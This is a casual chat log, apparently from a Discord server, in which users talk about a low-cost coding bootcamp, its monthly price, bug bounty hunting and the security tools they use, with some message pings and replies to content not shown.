chrome tree
#

I just watched those disappear one by one lol.

supple plume
#

Bro

#

@frail turtle

#

Don't get in a bootcamp

frail turtle
#

I been in it a week and a half now

supple plume
#

Vro...

frail turtle
#

it's okay it's only 25$ a month

supple plume
#

Oh ok

frail turtle
#

not some thousands dollars thing

supple plume
#

Usually these scams are like 2k a month

#

Yeah

#

Great

#

Although you don't need a bootcamp

gray wraith
frail turtle
#

yeah ik i just wanted some structure because I don't know a lot of things

gray wraith
#

Plenty of people here do BB

#

Plenty of people get some dimes from it

supple plume
supple plume
upbeat tangle
frail turtle
#

C too

supple plume
supple plume
gray wraith
upbeat tangle
frail turtle
#

lol my most used weapons are ligolo and burpsuite I can't deny it πŸ˜‰

chrome tree
frail turtle
chrome tree
#

Noice. I learned a lot, and the structure is really fun, imo. I'm currently on Functional Programming.

#

How'd you get it for 25? I'm paying the full 50. kek

#

well 49

supple plume
#

Oh you were talking to them mb @frail turtle

frail turtle
chrome tree
frail turtle
rapid badger
#

When i did it they only had backend in Go lol

subtle plover
#

@lilac cipher @austere sinew @frosty thistle

#

@supple plume @mystic harbor @gray wraith

#

Hi

#

@muted olive

#

@worn drift

#

@unreal sky

#

Hi

chrome tree
# frail turtle

Yeah, I pulled that trigger. That's a lot off for how much you'd pay in a year for the monly payment.

subtle plover